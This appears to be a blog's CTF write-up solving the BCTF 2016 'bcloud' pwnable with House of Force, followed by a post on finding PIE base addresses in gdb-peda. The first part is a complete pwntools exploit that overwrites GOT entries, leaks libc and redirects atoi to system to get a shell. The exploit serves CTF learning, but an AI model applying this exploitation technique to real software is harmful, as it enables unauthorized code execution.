[BCTF 2016] bcloud
Writing write-ups on my Tistory blog is getting really tedious...
Someday I should move to a GitHub blog. asdf
I solved bcloud. Since I have been writing write-ups in Markdown lately, Tistory is getting hard to use... but setting up a GitHub blog is a hassle, so I will just keep writing here....
The exploit went as follows.
Vulnerability: House of Force
1. Fill the name input with the full 0x40 bytes to leak heap_addr.
2. Use House of Force so that the next allocation is handed out starting from the free_got area.
3. Overwrite exit_got with main, and overwrite the remaining GOT entries with each original function's plt+6.
4. Overwrite the setvbuf entry with puts_plt+6 as well.
5. Deliberately exit.
6. Back in main, puts(stdin), puts(stdout) and puts(stderr) get printed, which gives the leak.
7. Compute the address of system from the leaked value.
8. Overwrite atoi with system to get a shell.
After finishing I realized I could simply have overwritten the note area allocated in bss (the heap note region? notes or whatever it was called) and used edit instead...
I thought there was no edit function, but there is;;
Anyway, it can be solved this way too~
```python
# Python 2 / pwntools style script (str payloads), as used in the write-up
from pwn import *

conn = process("./bcloud")

# Step 1: fill the name buffer completely so the heap pointer behind it is printed back
conn.sendafter("name:", "A"*0x40)
conn.recvuntil("A"*0x40)
heap_addr = u32(conn.recv(4))
log.info("heap : " + hex(heap_addr))

# Org/Host inputs: the Host line overwrites the top chunk size
conn.sendafter("Org:", "B"*0x40)
conn.sendlineafter("Host:", p64(0xFFFFFFFF))

def new(size, content):
    conn.sendlineafter("option--->>", "1")
    conn.sendlineafter(":", str(size))
    conn.sendlineafter("content:", content)

def edit(idx, content):
    conn.sendlineafter("option--->>", "3")
    conn.sendlineafter("id:", str(idx))
    conn.sendlineafter("content:", content)

def rm(idx):
    conn.sendlineafter("option--->>", "4")
    conn.sendlineafter("id:", str(idx))

# Step 2: House of Force size so the next chunk lands on the GOT
read_got = 0x804b00c
top = heap_addr + 0xd0
force = read_got - top - 0x8
log.info("force : " + str(force))

# force
conn.sendlineafter("option--->>", "1")
conn.sendlineafter(":", str(force))

main_addr = 0x8048C81
puts_plt = 0x8048520

# Steps 3-4: overwrite the GOT; exit -> main, others -> their own plt+6
payload = "A"*4                 # __stack_chk_fail
payload += p32(0x8048506)       # strcpy -> strcpy_plt+6
payload += p32(0x8048516)       # malloc -> malloc_plt+6
payload += p32(puts_plt+6)      # puts
payload += "A"*4
payload += p32(main_addr)       # exit
payload += "A"*4
payload += p32(puts_plt)        # setvbuf
payload += p32(0x8048576)       # memset_plt+6
payload += p32(0x8048586)       # atoi_plt+6
new(0x200, payload)

#context.log_level = "debug"
# Step 5: exit on purpose, which now returns to main
conn.sendlineafter("option--->>", "6")
conn.recvuntil("Bye!\n\n")

# Step 6-7: setvbuf(stdin, ...) became puts(stdin); derive the libc base
conn.recv(4)
stdin_addr = u32(conn.recv(4)) - 71
base_addr = stdin_addr - 0x1b25a0
log.info("stdin_addr : " + hex(stdin_addr))
log.info("base_addr : " + hex(base_addr))
system_addr = base_addr + 0x3ada0

conn.sendlineafter("name:", "A")
conn.sendlineafter("Org:", "B")
conn.sendlineafter("Host:", "C")

# Step 8: same GOT layout, but atoi -> system
payload = "A"*4
payload += p32(0x8048506)
payload += p32(0x8048516)
payload += p32(puts_plt+6)
payload += "A"*4
payload += p32(main_addr)
payload += "A"*4
payload += p32(puts_plt)
payload += p32(0x8048576)
payload += p32(system_addr)
edit(1, payload)

# the menu choice is passed to atoi, i.e. now to system
conn.sendlineafter("option--->>", "/bin/sh")
conn.interactive()
```
[Linux] Debugging PIE with gdb
With PIE, when debugging in gdb-peda the base address is always 0x0000555555554000...
So you can just add the function's offset to that and set the breakpoint there.
You do have to run the binary once first, though.
Well, there are other ways too...
The method below is one of them, but I rarely use it; I use the method above.
```
Reading symbols from datastore.elf...(no debugging symbols found)...done.
gdb-peda$ b * 0
Breakpoint 1 at 0x0
gdb-peda$ r
Starting program: /home/myria/study_pwn/plaiddb/datastore.elf
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x0

gdb-peda$ x/20i $pc
=> 0x7ffff7dd7c30:	mov    rdi,rsp
   0x7ffff7dd7c33:	call   0x7ffff7dd89b0
   0x7ffff7dd7c38:	mov    r12,rax
   0x7ffff7dd7c3b:	mov    eax,DWORD PTR [rip+0x225037]        # 0x7ffff7ffcc78
   0x7ffff7dd7c41:	pop    rdx
   0x7ffff7dd7c42:	lea    rsp,[rsp+rax*8]
   0x7ffff7dd7c46:	sub    edx,eax
   0x7ffff7dd7c48:	push   rdx
   0x7ffff7dd7c49:	mov    rsi,rdx
   0x7ffff7dd7c4c:	mov    r13,rsp
   0x7ffff7dd7c4f:	and    rsp,0xfffffffffffffff0
   0x7ffff7dd7c53:	mov    rdi,QWORD PTR [rip+0x2253e6]        # 0x7ffff7ffd040
   0x7ffff7dd7c5a:	lea    rcx,[r13+rdx*8+0x10]
   0x7ffff7dd7c5f:	lea    rdx,[r13+0x8]
   0x7ffff7dd7c63:	xor    ebp,ebp
   0x7ffff7dd7c65:	call   0x7ffff7de7750
   0x7ffff7dd7c6a:	lea    rdx,[rip+0xfe4f]        # 0x7ffff7de7ac0
   0x7ffff7dd7c71:	mov    rsp,r13
   0x7ffff7dd7c74:	jmp    r12
   0x7ffff7dd7c77:	nop    WORD PTR [rax+rax*1+0x0]
gdb-peda$ b *0x7ffff7dd7c6a
Breakpoint 2 at 0x7ffff7dd7c6a
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x0

gdb-peda$ d 1
gdb-peda$ r
Starting program: /home/myria/study_pwn/plaiddb/datastore.elf
[----------------------------------registers-----------------------------------]
RAX: 0x1c
RBX: 0x0
RCX: 0x7fffffffe5b8 --> 0x7fffffffe7f6 ("XDG_SESSION_ID=5")
RDX: 0x7fffffffe5a8 --> 0x7fffffffe7ca ("/home/myria/study_pwn/plaiddb/datastore.elf")
RSI: 0x1
RDI: 0x7ffff7ffe168 --> 0x555555554000 --> 0x10102464c457f
RBP: 0x0
RSP: 0x7fffffffe5a0 --> 0x1
RIP: 0x7ffff7dd7c6a (<_dl_start_user+50>:	lea    rdx,[rip+0xfe4f]        # 0x7ffff7de7ac0 <_dl_fini>)
R8 : 0x7ffff7ffe6f8 --> 0x0
R9 : 0x0
R10: 0x8e
R11: 0x7ffff7b95300 --> 0xfff229defff228ec
R12: 0x555555554bc7 (xor    ebp,ebp)
R13: 0x7fffffffe5a0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff7dd7c5f <_dl_start_user+39>:	lea    rdx,[r13+0x8]
   0x7ffff7dd7c63 <_dl_start_user+43>:	xor    ebp,ebp
   0x7ffff7dd7c65 <_dl_start_user+45>:	call   0x7ffff7de7750 <_dl_init>
=> 0x7ffff7dd7c6a <_dl_start_user+50>:	lea    rdx,[rip+0xfe4f]        # 0x7ffff7de7ac0 <_dl_fini>
   0x7ffff7dd7c71 <_dl_start_user+57>:	mov    rsp,r13
   0x7ffff7dd7c74 <_dl_start_user+60>:	jmp    r12
   0x7ffff7dd7c77 <_dl_start_user+63>:	nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7dd7c80 <_dl_initial_error_catch_tsd>:	lea    rax,[rip+0x226339]        # 0x7ffff7ffdfc0 <data>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe5a0 --> 0x1
0008| 0x7fffffffe5a8 --> 0x7fffffffe7ca ("/home/myria/study_pwn/plaiddb/datastore.elf")
0016| 0x7fffffffe5b0 --> 0x0
0024| 0x7fffffffe5b8 --> 0x7fffffffe7f6 ("XDG_SESSION_ID=5")
0032| 0x7fffffffe5c0 --> 0x7fffffffe807 ("SHELL=/bin/bash")
0040| 0x7fffffffe5c8 --> 0x7fffffffe817 ("TERM=xterm")
0048| 0x7fffffffe5d0 --> 0x7fffffffe822 ("SSH_CLIENT=192.168.233.1 49767 22")
0056| 0x7fffffffe5d8 --> 0x7fffffffe844 ("SSH_TTY=/dev/pts/1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x00007ffff7dd7c6a in _dl_start_user () from /lib64/ld-linux-x86-64.so.2
gdb-peda$ x/10i $r12
   0x555555554bc7:	xor    ebp,ebp
   0x555555554bc9:	mov    r9,rdx
   0x555555554bcc:	pop    rsi
   0x555555554bcd:	mov    rdx,rsp
   0x555555554bd0:	and    rsp,0xfffffffffffffff0
   0x555555554bd4:	push   rax
   0x555555554bd5:	push   rsp
   0x555555554bd6:	lea    r8,[rip+0xfc3]        # 0x555555555ba0
   0x555555554bdd:	lea    rcx,[rip+0xf4c]        # 0x555555555b30
   0x555555554be4:	lea    rdi,[rip+0xffffffffffffff35]        # 0x555555554b20
gdb-peda$ p 0x555555554b20
$1 = 0x555555554b20
gdb-peda$
```
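As an added example (not from the post), the arithmetic behind both methods in Python: the value in $r12 at _dl_start_user's `jmp r12` is the program's runtime entry point, so subtracting e_entry from the ELF header recovers the load base, and adding a function's file offset gives the address for `b *ADDR`. The ELF64 header bytes are constructed inline so the script runs offline; they are built to match the entry point the session shows (0x555555554bc7 at base 0x555555554000).

```python
import struct

# Fixed base gdb-peda showed for this PIE binary in the post (method 1).
DEFAULT_PEDA_BASE = 0x555555554000

def elf64_entry(header):
    """Return e_entry from the first 64 bytes of a little-endian ELF64 header."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if header[4] != 2:          # EI_CLASS: 2 = ELFCLASS64
        raise ValueError("only ELF64 is handled here")
    if header[5] != 1:          # EI_DATA: 1 = little-endian
        raise ValueError("only little-endian ELF is handled here")
    # e_entry is the 8-byte field at offset 0x18 of the ELF64 header
    return struct.unpack_from("<Q", header, 0x18)[0]

def pie_base_from_r12(r12, header):
    """Method 2: load base = entry point seen in $r12 minus the file's e_entry."""
    return r12 - elf64_entry(header)

def breakpoint_addr(base, func_offset):
    """Runtime address of a function given its file offset (e.g. from objdump)."""
    return base + func_offset

def gdb_break_cmd(base, func_offset):
    """The gdb command to set that breakpoint."""
    return "b *%#x" % breakpoint_addr(base, func_offset)

# Constructed ELF64 header (not a real binary): ET_DYN, x86-64, e_entry = 0xbc7,
# i.e. the same entry offset the session's $r12 (0x555555554bc7) implies.
FAKE_HEADER = (b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # e_ident
               + struct.pack("<HHI", 3, 62, 1)                 # e_type, e_machine, e_version
               + struct.pack("<QQQ", 0xbc7, 0x40, 0)           # e_entry, e_phoff, e_shoff
               + struct.pack("<IHHHHHH", 0, 64, 56, 0, 64, 0, 0))

if __name__ == "__main__":
    base = pie_base_from_r12(0x555555554bc7, FAKE_HEADER)
    print(hex(base))                    # 0x555555554000, same as the fixed peda base
    # 0xb20 is the offset of the address loaded into rdi in the session's x/10i $r12
    print(gdb_break_cmd(base, 0xb20))   # b *0x555555554b20
```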